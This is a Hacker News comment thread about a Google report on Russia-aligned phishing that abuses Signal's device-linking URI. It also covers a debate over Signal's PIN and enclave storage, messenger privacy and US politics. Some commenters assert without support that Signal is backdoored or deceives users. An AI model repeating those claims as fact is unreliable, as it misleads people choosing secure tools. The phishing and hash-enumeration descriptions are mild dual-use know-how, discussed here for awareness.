The issue isn't just attribution but also affiliation. When similar attacks come from Ukraine targeting Russia, Google stays quiet. I understand that Russia invaded Ukraine, not the other way around, but given the complexity of the conflict, aligning with one side in cyber warfare reporting is a questionable move. At the end of the day, attacks will come from both sides - it's a war, after all.

Edit: when I say 'questionable move', I'm specifically referring to Google. It's unclear what they were trying to achieve with this article, is it a political statement or just a marketing piece showcasing how good GTIG is? Or both?

The Ukrainian military is moving away from Telegram, which presumably still has some ties to Russia despite the claims. And this is yet another phishing campaign in Ukrainian language that makes use of Ukrainian-registered domains to host fake Signal group invites to make Ukrainian military join and link their devices to an adversary-controlled machine. Who might be behind that attack? Hmm, let me think... I don't know! Probably Ukrainians themselves. Or it might be the US. Might as well be the Martians. We will never know the real truth, after all nobody is to be trusted during the war!

Stop the tiresome FUD please. This war is surprisingly straightforward by the standards of the last century, it's literally out of some decades-old textbook. Let's not drag this discussion here again. If you have specific issues with Google's attribution here, please state them, HN is pretty aware that attribution can be shaky. My only gripe with the article is the clickbait title: nobody says that someone is "targeting e-mail" about e-mail phishing.

> Lots of Russian state actors have no problems working from within Ukraine, alas.

Ex: Viktor Yanukovych, prior to being ousted.

An unregistered domain can still be an IoC, especially when found through, e.g., payload analysis.
Oceania had always been at war with Eastasia.
[flagged]
"Russia-aligned threat"... so... the US?
> In each of the fake group invites, JavaScript code that typically redirects the user to join a Signal group has been replaced by a malicious block containing the Uniform Resource Identifier (URI) used by Signal to link a new device to Signal (i.e., "sgnl://linkdevice?uuid="), tricking victims into linking their Signal accounts to a device controlled by UNC5792.

Missing from their recommendations: Install No Script: https://noscript.net/

NoScript is a browser extension; Signal is an Android/iOS/Electron app, so no.
In each of the fake group invites, JavaScript code that typically redirects the user to join a Signal group has been replaced by a malicious block containing the Uniform Resource Identifier (URI) used by Signal to link a new device to Signal (i.e., "sgnl://linkdevice?uuid="), tricking victims into linking their Signal accounts to a device controlled by UNC5792.

Source: https://cloud.google.com/blog/topics/threat-intelligence/rus...

They should add an option to not allow linking additional devices, if that’s feasible.
> Android supports alphanumeric passwords, which offer significantly more security than numeric-only PINs or patterns.

Ironic, coming from Google. Android is the one OS where using alphanumeric passwords is nearly impossible, since it limits password length to an arbitrary 16 characters, preventing the use of passphrases.

Kind of a good sign for Signal's security that this is the best Russia has got!
I wouldn’t assume that but I also wouldn’t recommend against using Signal.
That we know of
Yeah, this just gave me the last nudge I needed to give Signal a go.
[flagged]
[flagged]
Interesting. Could you provide a better alternative? Preferably even remotely as user friendly as signal/whatsapp?
I found SimpleX recently (https://simplex.chat/), which got my attention because it uses a unique account schema that doesn't have any individual account identifiers. It's got some interesting features. Not sure about user-friendliness since I don't use other messaging apps to know what to expect.

It's mostly just interesting to me that they did away with the username entirely and they instead have users connect exclusively through shared secrets like they're Diffie and Hellman.

I don't have a good answer. Personally, I'm using Jami for secure communications but I won't pretend it replaces signal in terms of user-friendliness especially back when signal allowed SMS and secure communications in the same app!
Threema comes to mind.
Following the conversation down, it sounds like what you're really saying is that Signal stores sensitive information encrypted with PIN+SGX, which is controversial. And maybe you have a good argument for why it's bad (and I'm uneasy with it myself). But I think people don't like that you made the assumption for them that PIN+SGX is bad.
Even if everyone agreed that the system was secure, and they absolutely don't, see for example

https://web.archive.org/web/20210126201848mp_/https://palant...

https://www.vice.com/en/article/pkyzek/signal-new-pin-featur...

I think we should all agree that outright lying to users on the very first line of their privacy policy page is totally unacceptable.

You cited this so I think this is what you mean:

"Signal is designed to never collect or store any sensitive information."

I interpret this, I think reasonably, to not include encrypted information. For that matter they collect (but probably don't store) encrypted messages. The question is, does PIN+SGX qualify as sufficiently encrypted? This line is a lie only if it does not.

Sorry I skimmed those articles, I don't want to read them in depth. But it sounds like they are again ultimately saying "PIN+SGX is not secure enough".

> I interpret this, I think reasonably, to not include encrypted information

I disagree, since attacks and leaks which could compromise that data can happen and have happened. Signal was already found to be vulnerable to CacheOut. Even ignoring that, guessing or brute-forcing a PIN is all anyone would need to get a list of everyone a Signal user has been in contact with. Just having that data (and worse, keeping it forever) is a risk that absolutely should be disclosed.

> I don't want to read them in depth. But it sounds like they are again ultimately saying "PIN+SGX is not secure enough".

That was my conclusion back when all this started. The glaring lie and omissions in their privacy policy were just salt in the wound, but charitably, it might be a dead canary intended to help warn people away from the service. Similarly, dropping the popular feature of allowing unsecured SMS/MMS and introducing a crypto wallet nobody asked for might have also been done to discourage the app's use.

Okay, so you not only take issue with PIN+SGX, you think that any encryption scheme (at least from Signal) isn't secure enough. Your point still comes down to "they are storing sensitive information in a form that is ostensibly encrypted but still subject to attack (in the opinion of XYZ reputable people...)".

My point is only that the headline of your point was "they are lying about not storing sensitive information". That leaves out a very important part of your point. IMO it makes the claim seem sensationalized and starts you off on the wrong foot.

That's fair, I can see how someone could feel that way.
"I interpret this, I think reasonably, to not include encrypted information"

Why? Encrypted information is still sensitive information.

Maybe via metadata? The size of the information, etc. Do you mean that they should have a caveat about that?

Or if you want to be literal, you have to say that they're storing sensitive information even if it's encrypted. But by connotation that phrase implies that someone other than the user could conceivably have access to it. So for all any user could care, they just as well are not storing it. Do you mean that they should rephrase it so it's literally correct?

Or do you mean that it's actually bad for them to be collecting safely encrypted sensitive data? Because if so, you literally cannot accept any encrypted messenger because 3rd parties will always have access to it.

Yes, I think they should rephrase it so that it's literally correct. Personally, I have a very high trust in the safety of Signal's encryption and security practices. But privacy policies aren't for the Signals of the world, they're for the ad networks and sketchy providers. For example, many ad networks collect "Safely Encrypted" email addresses—but still are able to use that information to connect your Google search result ad clicks with your buying decisions on Walmart.com. Whether something is "safely" encrypted is a complicated, contextual decision based on your threat model, the design of the secure system in question, key custody, and lots of other complicated factors that should each be disclosed and explained, so that third parties can assess a service's data security practices. Signal is a great example of a service that does an excellent job explaining and disclosing this information, but the fact that their privacy policy contradicts their public docs lessens the value of privacy policies.
Okay that's fair. But as I said to autoexec, if your point includes that you don't rely on the encryption to be safe, you should probably include that in your point. A lot of people probably don't share that as a prior. (I suspect that's why autoexec was downvoted and flagged).
A ciphertext is not sensitive information. If your ciphertext can't be exposed to an adversary, your cryptography is fundamentally broken.
You can't make that statement blindly without knowledge of the entire cryptosystem and threat model. For example, to me, an encrypted version of my email address, as used by many ad networks to do retargeting, is still sensitive information if it lets Walmart serve me ads based on my Google search history.
I'm a big signal user yet skeptical that it's not directly involved with intelligence agencies. That's all to say, this sounds like FUD but I think it should be taken seriously. Out of curiosity, where have you read this?
It was a bit of a controversy when the change happened:

see https://web.archive.org/web/20210109010728/https://community...

https://www.vice.com/en/article/pkyzek/signal-new-pin-featur...

Note that the "solution" of disabling pins mentioned at the end of the article was later shown to not prevent the collection and storage of user data. It was just giving users a false sense of security. To this day there is no way to opt out of the data collection.

Obligatory request to provide a source to back up some serious claims?
If you're a signal user and didn't know about this already, that should tell you everything you need to know about signal.

See https://community.signalusers.org/t/proper-secure-value-secu...

Then read the first line of their terms and privacy policy page which says: "Signal is designed to never collect or store any sensitive information." (https://signal.org/legal/)

Signal loves to brag about the times when the government came to them asking for information only to get turned away because Signal never collected any data in the first place. They still brag about it. It hasn't actually been true for years though. Now they're collecting the exact info the government was asking for and they're protecting that data with a not-very-secure/likely backdoored enclave on the server side, and (even worse) a pin on the client side.

I see a link to a forum where an anonymous participant says

“Since a recent version of Signal data of all Signal users is uploaded to Signal’s servers. This includes your profile name and photo, and a list of all your Signal-contacts.”

They then link to a Signal blog (2019) explaining technical measures they were testing to provide verifiably tamperproof remote storage.

https://signal.org/blog/secure-value-recovery/

I’m not equipped to assess the cryptographic integrity of their claims, but 1) it sounds like you’re saying that they deployed this technology at scale, and 2) do you have a basis to suggest it’s “not-very-secure or likely backdoored,” in response to their apparently thoughtful and transparent engineering to ensure otherwise?

The communication Signal put out was extremely confusing and unclear which caused a lot of issues. They avoided answering questions about the data being collected and instead focused everything on SVR (see https://old.reddit.com/r/signal/comments/htmzrr/psa_disablin...)

The problems with the security of Signal's new data collection scheme were talked about at the time:

https://web.archive.org/web/20210126201848mp_/https://palant...

https://www.vice.com/en/article/pkyzek/signal-new-pin-featur...

You'll have to decide for yourself how secure pins and enclaves are, but even if you thought they were able to provide near-perfect security I would argue that outright lying to highly vulnerable users by saying "Signal is designed to never collect or store any sensitive information." on line one of their privacy policy page is inexcusable and not something you should tolerate in an application that depends on trust.

> 2) do you have a basis to suggest it’s “not-very-secure or likely backdoored,” in response to their apparently thoughtful and transparent engineering to ensure otherwise?

The forum post explains this:

> This data is encrypted by a PIN only the user can know, however users are allowed to create their own very short numeric PIN (4 digits). By itself this does not protect data from being decrypted by brute force. The fact that a slow decryption algorithm must be used is not enough to mitigate this concern; the algorithm is not slow enough to make brute-forcing really difficult. The promise is that Signal keeps the data secured on their servers within a secure enclave. This allows anyone to verify that no data is taken out of the server, not even by the Signal developers themselves, not even if they get a subpoena. At least that is the idea.

> It is also not clear if a subpoena can force Signal to quietly hand over information which was meant to stay within this secure enclave.
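To make the quoted brute-force concern concrete, here's a back-of-the-envelope sketch. The per-guess cost is an illustrative assumption, not a measured figure for Signal's actual KDF:

```python
# Keyspace-vs-KDF-cost arithmetic for numeric PINs. The 0.1 s/guess cost
# is an assumed figure for a deliberately slow KDF, purely for illustration.
def brute_force_hours(pin_digits: int, seconds_per_guess: float) -> float:
    keyspace = 10 ** pin_digits
    return keyspace * seconds_per_guess / 3600

# A 4-digit PIN falls in well under a day even at 0.1 s per guess;
# a 10-digit PIN at the same cost takes on the order of decades.
print(f"{brute_force_hours(4, 0.1):.2f} h")
print(f"{brute_force_hours(10, 0.1):.0f} h")
```

The takeaway matches the forum post: slowing the KDF only multiplies a tiny keyspace by a constant; it cannot make a 4-digit PIN safe against an attacker who can run guesses offline.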

That should be very concerning for activists/journalists who use Signal to maintain privacy from their government. Subpoena + gag order means the data is in the hands of the government, presuming Signal want to keep offering their services to the population of the country in question.

I wanted to add that there was also the cease-and-desist case against the Signal-FOSS fork that tried to implement an open server.

In my opinion Briar is where it's at, but because there's no data collection it's a pain to do a handshake or manage contacts.

Signal-FOSS is still around right? Got a link to some of the drama? I'm curious to see what their grounds were. Did they just object to the use of their name?
There is still Molly as a fork, but no idea how hardened it actually is.

After Moxie's statement at the time I kind of ditched everything regarding Signal's ecosystem. I understand the business perspective of it, but it's kind of pointless trying to say this is open source when it's illegal to press the Fork button on GitHub, you know.

https://github.com/mollyim/mollyim-android

Sounds quite fishy :( . Any specific proofs in addition to all what have been said so far? I've checked the links, they don't really prove anything...
here are links to additional discussions from the time of the change: https://community.signalusers.org/t/mandatory-pin-is-signal-...

One of the few articles that talked about it at the time: https://www.vice.com/en/article/pkyzek/signal-new-pin-featur...

One of the many reddit posts by confused users who misunderstood the very unclear communications by Signal: https://old.reddit.com/r/signal/comments/htmzrr/psa_disablin...

Also, Signal's spam folder isn't open source on the server side. They literally have code that reads your messages and checks whether they're spam, and you can't see what it does or how it's written.

Couple this with Signal being the preferred messaging app in Five Eyes countries, as advised by their three-letter agencies. If you think those agencies would recommend a form of comms they can't track, trace, or read, you obviously don't understand what they do.

While it seems to be true that it’s not open-source, they claim (in strong terms) that they use techniques other than reading the message to make that assessment:

https://signal.org/blog/keeping-spam-off-signal/

They point out that the protocol’s end-to-end cryptographic guarantees are still open and in place, and verifiable as ever. As far as I can tell, they claim that they combine voluntary user spam reports and metadata signals of some sort:

> When a user clicks “Report Spam and Block”, their device sends only the phone number that initiated the conversation and a one-time anonymous message ID to the server. When accounts are repeatedly reported as spam or network traffic appears to be automated, we can issue “proof of humanity” checks to suspicious senders so they can’t send more messages until they’ve completed a challenge. For example, if you exceed a configured server-side threshold for making requests to Signal, you may need to complete a CAPTCHA within the Signal application before making more requests. This approach slows down spammers while allowing regular messages to continue to flow.

Does that seem unreasonable? Am I missing places where people have identified flaws in the protocol?
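The "configured server-side threshold" in that quote is essentially rate limiting. A minimal token-bucket sketch of the idea (all limits here are assumptions, since Signal's actual thresholds aren't public):

```python
# Token bucket per sender: each request spends a token; tokens refill over
# time. Running out is the "over threshold" state that would trigger a
# proof-of-humanity challenge. Rates and burst sizes are illustrative.
import time

class SenderThrottle:
    def __init__(self, rate_per_sec=1.0, burst=20):
        self.rate, self.burst = rate_per_sec, burst
        self.state = {}  # sender -> (tokens, last_timestamp)

    def allow(self, sender, now=None):
        now = time.monotonic() if now is None else now
        tokens, last = self.state.get(sender, (self.burst, now))
        tokens = min(self.burst, tokens + (now - last) * self.rate)
        if tokens < 1:
            self.state[sender] = (tokens, now)
            return False  # over threshold: require a CAPTCHA before continuing
        self.state[sender] = (tokens - 1, now)
        return True

t = SenderThrottle(rate_per_sec=1, burst=3)
print([t.allow("sender", now=0.0) for _ in range(5)])  # [True, True, True, False, False]
```

Notably, this needs only a sender identifier and timestamps, which is consistent with the claim that the mechanism works on metadata rather than message contents.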

Can you elaborate? I'm semi-familiar with the Signal protocol but I'm not sure what you are referring to here.
See https://community.signalusers.org/t/proper-secure-value-secu...

Then read the first line of their terms and privacy policy page which says: "Signal is designed to never collect or store any sensitive information." (https://signal.org/legal/)

I was going to discount most of this. It appears this link is missing or private now. What did it say?
Fixed the link. Just to be safe, here's an archive of the page: https://web.archive.org/web/20210109010728/https://community...
Last week it was Microsoft, now Signal, who’s next?

https://www.microsoft.com/en-us/security/blog/2025/02/13/sto...

I hate to break it to you, but threat actors aligned with any major state are targeting everything with an Internet presence all of the time.
Can't view the article, as I am an evil Tor user.
Me too, but I was able to access the article through the Internet Archive:

https://web.archive.org/web/20250219202428/https://cloud.goo...

“Russia's re-invasion of Ukraine”

Reading this for the first time, what is a "re-invasion"? Do they mean the described cyberattack as a second invasion, aka "re-invasion"?

Invasion of Crimea 2014

Re-invasion in February 2022

Signal should be doing something well.
Phone verification is a common method used here.

If the victim's phone provider can somehow be compromised or coerced into cooperating, the government actor can intercept the text message Signal and others use for verification and set up the victim's account on a new device.

It's very easily done if the victim is located in an authoritarian country like Russia or Iran; they can simply force the local phone provider to cooperate.

> government actor can intercept the text message Signal and others use for verification and set up the victims account on a new device

Yes, but if they only control the phone number, they will register a new account (with different cryptographic keys) for you, which is why everyone previously chatting with you will get that "Your Safety Number with Bob changed" message.
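A simplified sketch of why that warning is unavoidable: the safety number is derived from both parties' identity keys (Signal's real fingerprint uses iterated SHA-512 over the keys; the single hash here is a simplification), so an attacker who re-registers the number with fresh keys necessarily changes it:

```python
# Simplified safety-number derivation: a digest over both identity keys.
# NOT Signal's actual algorithm; only illustrates the key-binding property.
import hashlib
import os

def safety_number(my_identity_key: bytes, their_identity_key: bytes) -> str:
    digest = hashlib.sha512(my_identity_key + their_identity_key).hexdigest()
    return digest[:12]  # truncated for display

alice_key = os.urandom(32)
bob_key = os.urandom(32)
attacker_key = os.urandom(32)  # attacker re-registers Bob's number with new keys

before = safety_number(alice_key, bob_key)
after = safety_number(alice_key, attacker_key)
print(before != after)  # True: the "Safety Number changed" warning fires
```

This is exactly the gap between SIM-swap attacks (new keys, visible change) and the linked-device phishing in the article (the victim's existing keys, no safety-number change at all).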

that's nice they provided a list of bad domains
Honestly don't use Signal for privacy or anonymity. I switched to it because it is not owned by a sycophant of Trump.

Oh how Americans make fun of the CCP but watching all the tech bros bend the knee was embarrassing.

"Russia-aligned threat actors" has a whole new meaning this last week.
I wonder if someone in the US will declare that, actually, Signal is actively targeting the Russia-aligned threat actors.
Or that Signal shouldn't have started it in the first place
Indeed. It now potentially includes a very long list of Americans.
What does that mean?
Trump and his voters.
Not sure why hating Russia should be treated as axiomatic.
[dead]
What difference does that make? More people being openly malicious doesn't make them right.
He also failed to secure a majority of the votes cast, winning with a mere plurality. (Not that the raw number of votes cast actually matters all that much, given our idiotic presidential electoral system.)

So what?

Totally agreed that it's out of bounds to label all Trump voters as rednecks & white nationalists. But not sure where you're getting that: read upthread. No one said anything like that. Just "Russia-aligned state actors". Which is also pretty silly.

But in a way, it's worse than all that. If his supporters were actually all rednecks & white nationalists (or Russia-aligned state actors), at least we could say, "well, the country is actually full of shitty, uneducated, racist people, so I guess this actually is the will of the people". But right, that's not the case. Instead, Trump and the GOP have lied and manipulated to the point they've managed to dupe a much more diverse group of people into believing in Trump. Or, at the very least, into believing that the system needs to burn in order for it to be remade in a way that will serve these people's interests.

All this is a crock, of course, and there are already quite a few surprised and upset Trump voters who have experienced an interruption or loss of some government service that they depend on. So OK, let's expand the list. Sure, there are rednecks & white nationalists. But there are also just regular ol' idiots who fell for Trump's nonsense. And actively awful people who are fine with a lot of others getting hurt, just to spite the current establishment.

They are all still Trumpists now.
Nobody labeled Trump voters as "redneck, white nationalists" in this thread. The claim was that Trump and his voters are "Russia-aligned", which is obvious at least for Trump and his immediate admin appointees.
I don't have opinions on most of this stuff but I know of some distant relative of mine who voted for Trump not because he's some sort of fascist but just because he didn't understand why voting for Trump maybe wasn't the best idea. People like this probably exist all over the place.
  • ·
  • 1 day ago
  • ·
  • [ - ]
[flagged]
>This comment isn't witty, and it doesn't contain any useful information or promote discussion either.

Complaining about the comment isn't witty, doesn't contain useful information, and doesn't promote discussion either.

I would recommend being the change you want to see in the world (or avoid political threads).

I strongly agree - HN has become increasingly Redditified in the political discussion sense. I think this website has the potential to have (and often already has) some of the best serious discussion on the internet, so it really nags at me that people have eroded this standard a lot recently IMO.
Sorry that you are so inconvenienced by the Russian coup of the US.
[flagged]
[flagged]
Only that the President is now trotting out lines created by the Kremlin's propaganda machine.
They are saying that the USA is potentially a Russia-aligned threat actor.
Look at the news about the latest USA-Russia talks. Basically, Trump is now repeating propaganda topics from Russia Today, including their fake claims about Ukraine.

The USA pushed Ukraine to give up its nukes and offered security assurances instead. And then, during a full-scale war, it donated just 30 old tanks. And now Trump is talking with Putin behind Ukraine's back about how they should surrender.

Unfortunately USA is not a superpower anymore and their word means nothing.

> Unfortunately USA is not a superpower anymore and their word means nothing.

I wish this were true, and while Mr. Trump has dedicated himself to ripping up the world order, the US still has way too many nukes to not treat as a substantial power.

If the US isn't a superpower, I'm not sure there are any superpowers left.

Trump blames Ukraine for starting the war, Putin is happy
I heard he also blames Poland for being invaded and starting WWII. As to that Archduke Ferdinand, diving in front of that bullet. Was asking for it.
> I heard he also blames Poland for being invaded and starting WWII.

This one is fake, even if plausible. https://www.der-postillon.com/2025/02/ueberfall-auf-polen.ht... - Der Postillon is the German equivalent of the US's The Onion.

The person you replied to was joking, but it makes it even funnier that you didn't think they were.
As someone living in Poland and tracking the developments in the US, when I used the word "plausible", I meant it.
POTUS giving Putin just what he wants re Ukraine. Ronald Reagan is spinning in his grave at near light speed, I imagine.
[flagged]
I thought drugs were illegal where you come from... cuz you smokin' some bad shit, blyat.
[flagged]
boo
tl;dr: they mostly use phishing with fake Ukrainian army group invites to trick people (in the Ukrainian army) into linking their phones to an attacker-controlled PC.

They also try to exfiltrate the actual SQL database files from Windows and Android devices.

I'd love to have more of my socializing happening on Signal. Anyone got a good way to convince the non-paranoid to use it?
"Sorry, I only use Signal" has worked nearly a decade for me
Virtue Signalling!
Which is bad, how?
It's a joke: virtue signaling (or whatever you want to call it) is considered bad, but Signal the messenger app is good, so it's a play on words.
It’s not bad. It just IS.

The only people who think it is bad are people who hold a different opinion and feel attacked for whatever reason. I find it telling when people accuse others of virtue signaling, because it is almost always someone jealous or insecure attacking the signaler.

"Virtue signaling" in theory means "talking the talk without walking the walk", but it's generally thrown out by people who make no effort to assess whether the person criticized is walking the walk or even in contradiction of such evidence.

Driving an economically efficient car -- choosing any sort of car -- has enormous consequences for one's life, for example. Choosing to buy a particular car isn't a decision made lightly. But Prius drivers back in the day were accused of virtue signaling, as though the Prius were equivalent to a temporary tattoo.

In fact, speaking of temporary tattoos, simply having a bumper sticker advocating for animal rights, acknowledging anthropogenic climate change, or calling for peace in the Middle East will expose one to regular displays of hostility and aggression, so it isn't a cheap signal.

In other words, in my experience your observation is spot on.

> "Virtue signaling" in theory means "talking the talk without walking the walk"

Virtue signaling means sending deliberate signals about your virtues, whether you "walk the walk" or not. People are often critiqued for going to uncomfortable lengths to signal their virtues, but something as simple as a "meat is murder" shirt or a MAGA hat is also virtue signaling.

What if you need to contact someone and they use whatsapp?
croes · 1 day ago
What if they want to contact you and you use Signal?
Luckily, with the technological advances of the last few months, it is now possible to install more than one app on a phone at a time.
It is also possible to communicate without using Meta services.
Good luck with that depending on where you live.
And when you live. The 20-to-30-year-old crowd I interact with seems to avoid, if not outright mock, FB. I recognize it has its uses and benefits, though.
They mock FB while using Instagram and WhatsApp.
> it is now possible to install more than one app on a phone at a time.

And, in doing so, achieve the security posture of the worse of the apps!

IME you say “Sorry I only use Signal” and either they change or you don’t get in contact with that person.

If you change and abandon your principles were they really principles in the first place?

How do you tell them that in the first place? You get someone's phone number, and the person who gives it to you says that they use WhatsApp. You can't even tell them "Sorry, I only use Signal" unless you open the WhatsApp app.
You realise you could use that phone number to... call them and let them know? Also, in what situation are they giving you a phone number and telling you they use WhatsApp, while you have no way to respond when receiving that info? If it's in person, you can explain at the time. If it's taken from a website, call them. Or you can even fall back on SMS.
Presumably at the time they've given you their phone number, they've told you that they are on WhatsApp, and then you've responded directly that you're only on Signal.

If there is a communications channel by which they can give you their phone number, you can use that same channel to discuss what messenger to use.

If they can't reach you via WhatsApp, they will call you.
Not GP - I tolerate Whatsapp but I draw the line at SMS.
For me it's the other way around: I tolerate SMS but I draw the line at Whatsapp.
Sounds like someone who never had to pay for each SMS.
RCS?
If you really really really need to? You use Whatsapp.

If you don't need to? You tell them to get Signal.

You call them. Or use SMS. Or use e-mail.
same
rakoo · 1 day ago
Take time with the people to do the boring stuff on their phone/computer:

- install [the thing]

- start it, show how it works

- search for yourself, start a convo, exchange messages

- add them to the group

IME the friction comes from having to do the first step, because it's an annoyance no one wants to bother with; if you take it on yourself and do it for them, they'll appreciate that.

I usually tell people, "It's like iMessage, but it works on iPhone and Android," or "Hey, if you download Signal we can send high-quality photos between Android and iPhone."
My (non-technical) Mom actually got my whole extended family on Signal with a group link. Since there's no real account creation it was painless. It's how we do all video calls/photo sharing/chat now.
I helped an especially non-technical user install Signal and they didn't need my help at all. They were using it in a minute - download from the app store, transcribe a code from a text message, and you're in - and it worked just like legacy text and phone.

I'd tell them that - just download it and you'll be texting me in a minute, and now nobody is tracking everyone you talk to.

To be clear, someone will/can track WHO you talk to. Right?
My understanding is that they can/do on WhatsApp.

On Signal, unless there is some bug or outright fraud, AFAIK they cannot; that is one of their fundamental goals, and they did a lot of work to develop communication technology that works without revealing that metadata.

(Of course, if someone gets access to your phone, then they know who you are talking to.)

That kind of metadata is not stored by Signal, as far as I know. But yes, the data streams between two endpoints can be correlated to show that they are communicating with each other.
jaza · 1 day ago
I've still got Signal installed, but never use it, I only ever ended up chatting on it with a few ex-colleagues, who were fellow devs / nerds.

I have so many WhatsApp group chats (here in Australia) that are critical for me these days, that I don't control, and that have way too many people, and way too diverse a range of people, for me to have any hope whatsoever of migrating them all to Signal. School parents' group chats (one for each class my kids are in). The strata (aka Home Owners Association) committee group chat. The Scouts group chat. Various friend-group chats. Boycotting WhatsApp is not an option for me; it would literally make me unable to function in a number of my day-to-day responsibilities.

Group stories are great fun and a feature I seriously miss on WhatsApp. They work well for everything from meme chats to family groups.

There being a killer feature that Whatsapp users are missing out on won't convince everyone but it sure makes me feel less like a nerd when encouraging the switch to Signal.

I find it quite funny that such an obvious feature likely hasn't been added to WhatsApp yet, because Meta thinks Instagram is for stories. That's pure speculation on my part, though.

lcc · 1 day ago
I've had good luck just asking for it, even with group chats (though admittedly my friends are mostly technical and more privacy conscious than the average person). Usually it's a switch from FB Messenger and I just say that I don't want to be locked into Facebook anymore.
Just explain what end-to-end encryption means. People are starting to get it and don't want companies able to read their messages.
Isn’t WhatsApp end-to-end encrypted?
Yes, it is; they actually use the Signal protocol [0], but they collect metadata, which Signal supposedly doesn't (you can't really know).

[0] https://en.wikipedia.org/wiki/Signal_Protocol#:~:text=Severa...

Signal doesn't collect that data, but you have no reason to trust me on it.

Look at what data they can provide to governments when compelled by law: https://signal.org/bigbrother/

I thought they recorded the metadata: who talks to whom and when. (For the uninitiated, that is as valuable as or more valuable than the message contents.)
You also send them your contacts in plaintext so you can find who else is on WhatsApp; Signal doesn't.
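(An aside on why "just hash the uploaded contacts" wouldn't help much either: the phone-number keyspace is tiny, so a server can reverse plain hashes by enumeration. A minimal Python sketch with a made-up number range; this naive SHA-256 scheme is a strawman, not any app's actual mechanism:)

```python
import hashlib

def h(number: str) -> str:
    """Naive 'anonymization': hash the phone number."""
    return hashlib.sha256(number.encode()).hexdigest()

# The server only ever sees this hashed upload...
uploaded = h("+15550003417")

# ...but the space of plausible numbers is small enough to enumerate,
# so the server can recover the original contact by brute force.
found = next(
    n for n in (f"+1555000{i:04d}" for i in range(10_000))
    if h(n) == uploaded
)
print(found)  # "+15550003417": the hash reveals the contact anyway
```

This is why simply hashing contact lists is not considered a real privacy measure, and why more involved designs (private contact discovery, enclaves, etc.) exist at all.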
https://www.reddit.com/r/privacy/comments/v7tsou/is_whatsapp...

It seems to be, but there is more to it than that.

baq · 1 day ago
Nobody cares about this unless they deal drugs or something.

What some people care about is not giving all their private conversations to masculine energy zuck - but don't expect any major wins.

An awfully shortsighted and uninformed viewpoint that has been beaten into the ground ad nauseam.

Read a couple books. Privacy is a precondition to democracy.

baq · 1 day ago
It isn't a viewpoint; it's a fact. I've been using Signal for almost a decade now and have only managed to get a dozen or so people to use it in any capacity. Most keep using WhatsApp as their primary method of communication anyway.
Meanwhile, I have been using Signal since the TextSecure days, too, and practically all my contacts are using it these days.
baq · 1 day ago
Good for you, tell us how you did it!
lukan · 1 day ago
What books would you recommend that prove that connection?

"Privacy is a precondition to democracy"

How would you convert an autocracy into a democracy without secrecy? There are no peaceful means, so you have to plot.
lukan · 1 day ago
Secrecy and privacy are not really the same concept.
>Read a couple books

Maybe you should? It might help improve your reading comprehension. The person you're responding to said that most normal people don't care enough to switch to a vastly less popular app, which is obviously true.

My Signal experience: ex gf in college asks what app I’m using to text. Tell her it’s Signal, E2EE, messages are only stored on her phone and nobody else can read them. She says cool and downloads the app. Four months later her phone breaks.

“Hey subjectsigma I got my new phone today. Where are all my messages?”

“… Do you have your old phone? That’s the only place they are.”

“No? Last time I got a new phone WhatsApp moved my messages over, and WA is E2EE so I thought it worked the same way.”

“Nope if you don’t have a backup or your old phone they’re gone. Sorry.”

“This is bullshit. Why does anyone use Signal. I can’t believe it deleted all my messages. I’m uninstalling it. Etc etc.”

We have a long way to go, my friend.

It only works for WhatsApp if you have Backup to Google activated [1]. I once tried to restore from backed-up files from my old phone and it didn't work. (Older tutorials indicated that it once worked, though.)

[1] There was a time when WhatsApp had a nag screen if you didn't have Backup to Google activated. So I guess most people would have eventually caved.

That nag-screen is still there, it pops up roughly every three months for me (though not on my primary phone, Whatsapp won't get anywhere near that one).
I'm not going to run interference against all the comments you're writing on this thread, because I don't think Signal needs the help and it would make the thread ultra-tedious. But during the brief window where people were taking Wire seriously as a Signal alternative, I'd occasionally write a comment or tweet like:

Were you aware that Wire keeps a high-fidelity plaintext database of exactly who talks to who on their platform?

And people were reliably startled. But all that was happening was that ordinary users have no mental model for how a secure messenger is designed, and hadn't thought through how serverside contact lists that magically work no matter what device you enroll in the system were actually designed.

So here I'll just say: the stuff you're saying about Signal is pretty banal and uninteresting. The SGX+Enclave stuff is Signal's answer to something every other mainstream messenger does even worse than that. By all means, flunk them on their purity test!

Even if you thought that SGX was bulletproof and pins were impossible to brute force, instead of just being 'better than what most other apps use' what possible justification is there for outright lying to users by claiming that their app doesn't collect any sensitive data when it does?

Signal is advertised and recommended to some extremely vulnerable people whose lives/freedom depend on their security. Signal owes users a clear explanation of the risks that come from the use of their software so that whistleblowers, journalists, and activists can make informed choices. Lying to those users is disgusting.

Seen most charitably, the fact that the very first line of their privacy policy page is an outright lie might be intended as a dead canary to warn users away as loudly as they can, but even in that case I'll be happy to say it plainly: Signal shouldn't be trusted.
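(For intuition on the PIN brute-force point above: most people pick short numeric PINs, whose keyspace is tiny compared to a real passphrase, which is why the whole scheme leans on hardware protection. A rough back-of-the-envelope sketch in Python; the guess rate is made up for illustration and is not Signal's actual SVR parameter:)

```python
import math

# Hypothetical attacker who can try guesses offline once the
# hardware protection (e.g. an SGX enclave) is bypassed.
GUESSES_PER_SECOND = 1_000_000  # made-up rate for illustration

def seconds_to_exhaust(keyspace: int) -> float:
    """Worst-case time to enumerate the whole keyspace."""
    return keyspace / GUESSES_PER_SECOND

four_digit_pin = 10 ** 4      # only 10,000 possibilities
random_passphrase = 2 ** 77   # roughly 6 random Diceware words

print(seconds_to_exhaust(four_digit_pin))  # a fraction of a second
print(math.log2(random_passphrase))        # 77.0 bits: infeasible offline
```

The asymmetry is the whole argument: a 4-digit PIN falls instantly to offline search, so the security of PIN-protected data rests entirely on whether the enclave actually prevents offline guessing.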

I think we know you're happy to say it plainly, since you've been saying it plainly for over 4 years.
This comes as news to me, and rather disappointing news at that. Do you have a source I can read further?
Several sources and links for more info; check my profile. I don't want to spam the same links all over this topic, but I'd start here:

https://community.signalusers.org/t/proper-secure-value-secu...

https://web.archive.org/web/20210126201848mp_/https://palant...

https://www.vice.com/en/article/pkyzek/signal-new-pin-featur...

Russia fucking up the world's affairs this decade will be material for the history books. They are actively breaking Europe, and almost no one seems to care.
The second chapter will be how the internet, with social media like Twitter/X, destroyed our democracy.
If Europe is what it claims to be, an enlightened democracy with a progressive and intelligent populace, it cannot be broken by demented crap messages from Twitter.

If, however, it is fucked up and on the brink of collapse, then sure, a little nudge can steer it in the "right" direction. But then who is guilty in the first place?

You should read up on how Russian money buys influence, e.g. in Moldova.
nomat · 1 day ago
The idea that propaganda doesn't work is certainly an interesting one.
